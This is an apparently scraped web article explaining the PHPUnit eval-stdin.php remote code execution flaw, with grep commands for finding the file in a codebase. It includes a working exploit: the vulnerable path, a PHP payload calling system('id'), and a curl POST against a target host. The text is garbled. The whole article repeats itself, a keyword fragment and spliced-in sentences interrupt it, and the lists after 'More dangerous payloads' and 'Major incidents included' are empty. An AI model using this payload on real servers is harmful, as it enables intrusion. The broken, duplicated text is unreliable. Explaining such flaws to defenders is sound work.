Search your codebase for unsafe patterns:
grep -r "php://input" vendor/phpunit/
grep -r "eval-stdin" vendor/
In certain versions of PHPUnit, a vulnerability was identified that could allow an attacker to execute arbitrary code on the server. This often involves a scenario where an attacker can manipulate input that is not properly sanitized, leading to a situation where they can execute PHP code through mechanisms like eval().
The eval-stdin.php file in the context of PHPUnit is a script that is sometimes used for testing or utility purposes. However, if not properly secured, it can become a vector for attacks, especially in scenarios where user input is directly fed into an eval() function without adequate validation or sanitization.
Ironically, eval-stdin.php was not designed as a backdoor. It was a utility script for PHPUnit’s own internal process isolation. When running tests that call exec() or external processes, PHPUnit used this script to evaluate small snippets of PHP code passed via standard input. The developer intended to use it exclusively from the command line. vendor phpunit phpunit src util php eval-stdin.php cve
The critical oversight: No authentication, no IP whitelisting, no php_sapi_name() check to ensure it runs via CLI. When exposed to a web server, it transforms into an unrestricted RCE gadget.
An attacker sends an HTTP request to:
http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
with a raw POST body containing PHP code. For example: Search your codebase for unsafe patterns: grep -r
Payload (URL-encoded or raw):
<?php system('id'); ?>
cURL example:
curl -X POST http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php \
-d "<?php system('id'); ?>"
If the script is accessible and the vendor directory is not protected, the server will execute id and return the output. In certain versions of PHPUnit, a vulnerability was
More dangerous payloads:
Between 2017 and 2019, this vulnerability was a goldmine for attackers. Major incidents included:
Security scanners like WPScan, Nuclei, and Nessus added dedicated checks for eval-stdin.php due to its prevalence.
Search your codebase for unsafe patterns:
grep -r "php://input" vendor/phpunit/
grep -r "eval-stdin" vendor/
In certain versions of PHPUnit, a vulnerability was identified that could allow an attacker to execute arbitrary code on the server. This often involves a scenario where an attacker can manipulate input that is not properly sanitized, leading to a situation where they can execute PHP code through mechanisms like eval().
The eval-stdin.php file in the context of PHPUnit is a script that is sometimes used for testing or utility purposes. However, if not properly secured, it can become a vector for attacks, especially in scenarios where user input is directly fed into an eval() function without adequate validation or sanitization.
Ironically, eval-stdin.php was not designed as a backdoor. It was a utility script for PHPUnit’s own internal process isolation. When running tests that call exec() or external processes, PHPUnit used this script to evaluate small snippets of PHP code passed via standard input. The developer intended to use it exclusively from the command line.
The critical oversight: No authentication, no IP whitelisting, no php_sapi_name() check to ensure it runs via CLI. When exposed to a web server, it transforms into an unrestricted RCE gadget.
An attacker sends an HTTP request to:
http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
with a raw POST body containing PHP code. For example:
Payload (URL-encoded or raw):
<?php system('id'); ?>
cURL example:
curl -X POST http://target.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php \
-d "<?php system('id'); ?>"
If the script is accessible and the vendor directory is not protected, the server will execute id and return the output.
More dangerous payloads:
Between 2017 and 2019, this vulnerability was a goldmine for attackers. Major incidents included:
Security scanners like WPScan, Nuclei, and Nessus added dedicated checks for eval-stdin.php due to its prevalence.